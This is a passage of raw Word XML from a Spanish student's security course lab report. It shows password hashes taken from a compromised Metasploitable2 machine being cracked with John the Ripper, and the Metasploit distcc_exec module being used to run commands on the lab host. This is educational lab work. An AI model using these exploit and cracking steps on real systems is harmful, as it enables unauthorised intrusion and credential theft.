        </w:rPr>
        <w:t>". Para ello, ejecutamos el</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comando pasándole como entrada </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>el fichero obtenido de la máquina comprometida.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C708F" w:rsidRDefault="00315FF1" w:rsidP="006672BF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5525" cy="266700"/>
                <wp:effectExtent l="0" t="0" r="28575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F1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1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oh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–show </w:t>
                            </w:r>
                            <w:r w:rsidRPr="006672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t>/root/.msf4/loot/20161005212210_default_192.168.10.11_linux.hashes_678734.txt</w:t>
                            </w:r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0;width:480.75pt;height:21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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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joh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–show </w:t>
                      </w:r>
                      <w:r w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>/root/.msf4/loot/20161005212210_default_192.168.10.11_linux.hashes_678734.txt</w:t>
                      </w:r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</w:p>
    <w:p w:rsidR="007C708F" w:rsidRDefault="007C708F" w:rsidP="006672BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="007C708F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En apenas dos segundo</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ha obtenido las contraseñas de todos los usuario</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">s, y usando la opción "--show", </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>se han mostrado todas por pantalla, obteniendo los siguientes resu</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ltados (del usuario "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">"  </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>obtiene la nueva contraseña):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FF1" w:rsidRDefault="005767B8" w:rsidP="006672B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1419225"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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10 19.28.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2BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="00315FF1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Parte IV: Extra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF" w:rsidP="007C708F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En la parte extra, se ha aprovechado otra vulnerabilidad de la máq</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">uina consistente en una puerta  </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>trasera en el servicio "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>". Dicho servicio sirve para repartir ta</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">reas de compilación a través de </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>la red entre distintos participantes. En nuestro caso, este servicio se puede atacar fácil</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">mente </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>haciendo que se ejecute un cierto comando a nuestra elección:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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95675" cy="1857375"/>
                <wp:effectExtent l="0" t="0" r="28575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F1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1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1.- Seleccionamos el módulo.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="007C708F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use</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidR="00315FF1" w:rsidRPr="00667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exploit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF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unix</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF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misc</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF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distcc_exec</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1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2.- Asignamos parámetros.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="007C708F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set</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> RHOST 192.168.10.11</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1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 xml:space="preserve">3.- Ejecutamos el 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exploit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="006672B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315FF1" w:rsidRPr="006672BF" w:rsidRDefault="007C708F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exploit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/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0;width:275.25pt;height:146.2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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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1.- Seleccionamos el módulo.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="007C708F" w:rsidP="00315F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="00315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>use</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="00315FF1" w:rsidRPr="006672B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315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>exploit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF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="00315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>unix</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF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="00315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>misc</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF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="00315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>distcc_exec</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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2.- Asignamos parámetros.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="007C708F" w:rsidP="00315F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="00315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>set</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> RHOST 192.168.10.11</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00315FF1" w:rsidRPr="006672BF" w:rsidRDefault="00315FF1" w:rsidP="00315FF1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 xml:space="preserve">3.- Ejecutamos el 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exploit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="006672B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315FF1" w:rsidRPr="006672BF" w:rsidRDefault="007C708F" w:rsidP="00315F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proofErr w:type="gramStart"/>
                      <w:r w:rsidR="00315FF1" w:rsidRPr="006672BF">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                        </w:rPr>
                        <w:t>exploit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/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  <w:r w:rsidR="006672BF" w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="006672BF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6672BF" w:rsidRP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</w:rPr>
        <w:t xml:space="preserve">Para comprobar que se ha realizado la conexión con éxito, se ejecuta </w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">en la sesión abierta el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a" e "id", obteniendo los siguientes resultados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006672BF" w:rsidRPr="006672BF" w:rsidRDefault="0026408C" w:rsidP="006672B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1009015"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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10 19.31.3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F7" w:rsidRP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</w:rPr>
        <w:t>En conclusión, se ha accedido a la máquina "metaspoitable2" satisfactori</w:t>
      </w:r>
      <w:r w:rsidR="00315FF1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">amente, y en la sesión abierta, </w:t>
      </w:r>
      <w:r w:rsidRPr="006672BF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ya se puede ejecutar cualquier comando en dicha máquina.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005C59F7" w:rsidRPr="006672BF" w:rsidSect="006672B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A131E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A985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6F"/>
    <w:rsid w:val="000D4269"/>
    <w:rsid w:val="00106DA0"/>
    <w:rsid w:val="0016377F"/>
    <w:rsid w:val="0026408C"/>
    <w:rsid w:val="003059EE"/>
    <w:rsid w:val="00315FF1"/>
    <w:rsid w:val="003528D6"/>
    <w:rsid w:val="0049066F"/>
    <w:rsid w:val="005767B8"/>
    <w:rsid w:val="005C59F7"/>
    <w:rsid w:val="00630722"/>
    <w:rsid w:val="006672BF"/>
    <w:rsid w:val="006D64E5"/>
    <w:rsid w:val="007B2631"/>
    <w:rsid w:val="007C708F"/>
    <w:rsid w:val="0092277A"/>
    <w:rsid w:val="00A55636"/>
    <w:rsid w:val="00A94DA4"/>
    <w:rsid w:val="00AC7BED"/>
    <w:rsid w:val="00C01341"/>
    <w:rsid w:val="00D04B95"/>
    <w:rsid w:val="00D06657"/>
    <w:rsid w:val="00D22027"/>
    <w:rsid w:val="00E83B18"/>
    <w:rsid w:val="00F51125"/>
    <w:rsid w:val="00F7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2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2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B2AD6-BE45-4E3B-87FA-C83E0ECF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163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RIDAD INFORMÁTICA</vt:lpstr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RIDAD INFORMÁTICA</dc:title>
  <dc:subject>Práctica 1 (Parte extra pág. 8)</dc:subject>
  <dc:creator>Jorge Andrés Galindo - 679155</dc:creator>
  <cp:lastModifiedBy>Usuario</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <cp:lastPrinted>2016-10-10T17:48:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-10T16:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-21T19:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>